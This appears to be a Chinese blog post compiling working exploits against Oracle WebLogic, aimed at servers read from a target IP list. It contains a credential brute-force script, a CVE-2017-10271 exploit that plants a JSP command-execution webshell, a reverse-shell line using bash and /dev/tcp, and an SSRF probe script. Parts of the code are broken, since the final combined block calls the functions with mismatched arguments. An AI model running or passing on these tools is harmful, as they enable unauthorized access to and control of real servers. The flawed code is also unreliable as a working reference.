poc weblogic 漏洞利用_weblogic漏洞利用汇总
漏洞列表弱口令
ssrf CVE-2014-4210
WLS 组件远程代码执行 CVE-2017-10271
任意上传 CVE-2018-2894
weak passwd&&CVE-2018-2894
weblogic 10.3.6(11g)
登录地址:
http://ip:7001/console/login/LoginForm.jsp
默认口令:
weblogic
Oracle@123
CVE-2018-2894要登录上传详情
POCimport requests
def weak_passwd():
users = ['weblogic','admin','system','mary','wlcsystem','wlpisystem']
passwds = ['password','Oracle@123','weblogic','security','wlcsystem','wlpisystem']
with open(r'ip.txt','r') as f:
for ip in f.readlines():
ip = ip.strip()
try:
target = 'http://' + ip + '/console/j_security_check'
headers = {
'Host': ip,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
}
for user in users:
for passwd in passwds:
data = {'j_username':user,'j_password':passwd}
r = requests.post(url=target,data=data,headers=headers,timeout=5)
if r.text.count('注销') != 0:
print('[+]' + ip + ' 登录成功' + 'user:{} passwd:{}'.format(user,passwd))
except Exception as e:
print('[+]' + ip + ' 失败')
if __name__ == '__main__':
weak_passwd()
CVE-2017-10271
Oracle WebLogic Server10.3.6.0.0 版本
Oracle WebLogic Server12.1.3.0.0 版本
Oracle WebLogic Server12.2.1.1.0 版本
Oracle WebLogic Server12.2.1.2.0 版本
反弹shell
传cmdshell
EXPimport requests
def wls_unser():
with open(r'ip.txt','r') as f:
for ip in f.readlines():
ip = ip.strip()
try:
url = 'http://' + ip + '/wls-wsat/CoordinatorPortType'
target = 'http://' + ip + '/bea_wls_internal/index.jsp'
headers = {
'Content-Type': 'text/xml',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
}
data = '''
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/index.jsp
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("
");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("
");
} %>]]>
'''
'''
反弹shell请替换data以及接收端ip
/bin/bash
-c
bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/21 0>&1
'''
r = requests.post(url=url,data=data,headers=headers,timeout=4)
res = requests.get(url=target,headers=headers,timeout=4)
if res.status_code == 200 :
print('[+] shell:' + target)
except Exception as e:
print('[+]'+ ip + ' 失败')
if __name__ == '__main__':
wls_unser()
SSRF
docker搭建环境失败了,不知道什么原因。
ssrf利用
EXP
环境没搭建成,没测试
import requests
def ssrf(ip):
try:
#payload =input('payload:')
target = 'http://' + ip + '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator={}'.format(payload)
if payload == '':
target = 'http://' + ip + '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001'
headers = {
'Content-Type': 'text/xml',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
}
res = requests.get(url=target,headers=headers,timeout=4)
if res.status_code == 200 and 'Oracle WebLogic Server' in res.text:
print('[+]' + ip + ' 存在ssrf')
else:
print(res.text)
except Exception as e:
print('[+]' + ip + ' 失败')
if __name__ == '__main__':
with open(r'ip.txt','r') as f:
for ip in f.readlines():
ip = ip.strip()
wls_unser(ip)
weak_passwd(ip)
ssrf(ip)
简单合一块也没加多线程效率低下。
poc weblogic 漏洞利用_weblogic漏洞利用汇总相关推荐
- poc weblogic 漏洞利用_Weblogic 漏洞利用总结
整理的一些利用方式,后续会更新到15年至今的洞 后台爆破拿shell 后台爆破: 部署-安装-上载文件 制作war包,一直下一步,最好保存 jar -cvf shell.war ./shll/* 上传 ...
- CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
- 一则利用内核漏洞获取root权限的案例【转】
转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...
- 【安全漏洞】朝鲜InkySquid APT组织是怎么利用浏览器漏洞感染受害者
朝鲜InkySquid APT组织利用浏览器漏洞感染受害者. 2021年4月,Volexity研究人员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]servic ...
- 别再问Cloudflare CDN 漏洞是怎么被利用的啦!这篇文就来告诉你
Cloudflare 已修复其免费开源 CDNJS 中的一个严重漏洞,该漏洞可能影响互联网上 12.7% 的网站. CDNJS为数百万网站提供超过4000个JavaScript和CSS库,这些库公开存 ...
- Android libcutils库中整数溢出导致的堆破坏漏洞的发现与利用
作者:龚广(@oldfresher) 阅读本文之前,您最好理解Android中的Binder机制.用于图形系统的BufferQueue原理.堆管理器je_malloc的基本原理. 此文介绍了如何利用l ...
- weblogic中ssrf漏洞修复_WebLogic SSRF 及漏洞修复
SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端.攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服 ...
- 漏洞挖掘、漏洞分析和漏洞利用
漏洞挖掘.漏洞分析和漏洞利用 利用漏洞进行***可以大致分为漏洞挖掘.漏洞分析.漏洞利用三个步骤.这三部分所用的技术有相同之处,比如都需要精通系统底层知识.逆向工程等:同时也有一定的差异. 1 ...
- 自检代码中trustmanager漏洞_Windows内核漏洞利用教程
堆栈溢出漏洞 首先,我们将从HackSysExtremeVulnerableDriver中的vanilla栈溢出漏洞开始讲起. 当向堆栈上的缓冲区存放的数据超出其存储容量时(例如,向16字节缓冲区(这 ...
最新文章
- python namedtuple用法_Python namedtuple(命名元组)使用实例
- 新版数采仪问题解决全记录-升级失败问题
- matlab中方波信号的谐波表示
- java按钮改变窗口大小_布局似乎有问题,JButton在调整窗口大小时显示出意外的行为。...
- php substr_replace 中文乱码,php substr_replace替换字符串一些实例_PHP教程
- 深度学习实践指南(二)—— 符号编程
- ip_conntrack: falling back to vmalloc解决办法
- 智汇华云 | 集群自动化部署服务流程之自动化集群配置(上)
- 小程序毕设作品之微信酒店预订小程序毕业设计(8)毕业设计论文模板
- nodejs读取服务器json文件,如何使用Node.js读取JSON文件
- ReportMachine报表控件唯一官方论坛 - http://rmachine.5d6d.com/
- java线程栈日志_Java线程堆栈
- 童年十大经典玩耍游戏
- String的spilt()方法
- UE4中程序驱动的LookAt动画
- 空气质量指数(AQI)分析与预测
- 浅谈SEO的优化问题
- android应用 数量,谷歌Android应用数量超40万 免费应用占总数2/3
- java以下声明变量中 是不合法的_java考试复习题
- 这一次,彻底搞懂useEffect
热门文章
- 初级项目经理和高级项目经理的区别
- 只需5分钟看完这篇 HTTPS,去阿里面试和面试官扯皮就没问题了!
- 【网络篇】几种网络模式
- 计算机教案.doc免费,计算机模板教案.doc
- 基于python实现百度网盘文件下载
- springboot基于微信小程序的运动软件前端的设计与实现 毕业设计-附源码100932
- curl post参数问题
- java 之sun_“Java之父”讲解不为人知的Sun软件趣闻
- 基金行业应用软件机器人实现估值核算自动化
- 十四届蓝桥杯青少组选拔赛Python_2023.02.12